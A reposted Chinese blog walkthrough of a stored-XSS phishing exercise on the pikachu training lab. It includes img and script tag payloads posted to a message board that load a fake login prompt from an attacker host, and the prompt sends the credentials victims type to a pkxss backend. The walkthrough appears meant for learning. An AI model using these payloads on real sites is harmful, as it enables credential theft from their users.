pikachu--XSS(案例二:釣魚攻擊)


案例二:釣魚演示(存儲型xss)

進入文件修改ip

 

 

 

 

給出認證框,用戶輸入用戶名、密碼,重定向到后台

同樣的后台也有同樣的接口,get方式獲取到用戶名跟密碼然后存儲

 我理解的釣魚攻擊就是攻擊者給用戶可以正常的看上去沒有欺騙的可信的頁面,而這個頁面被攻擊者嵌入了一些惡意的代碼,進行盜取用戶的一些信息。

當用戶點開這個頁面之后,看到是正常的頁面,實際上登錄信息等都被攻擊者在后台頁面獲取到

 

利用這個

回到存儲型xss留言板  輸入

<img  src=" http://192.168.27.156/pkxss/xfish/fish.php"  />    img標簽

<script  src=" http://192.168.27.156/pkxss/xfish/fish.php">  </script>  script標簽

 

 

刷新之后還是會有這個彈框

 

 

輸入用戶名  密碼  admin   root

返回pkxss后台界面,刷新就會有剛才的獲取到的信息


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM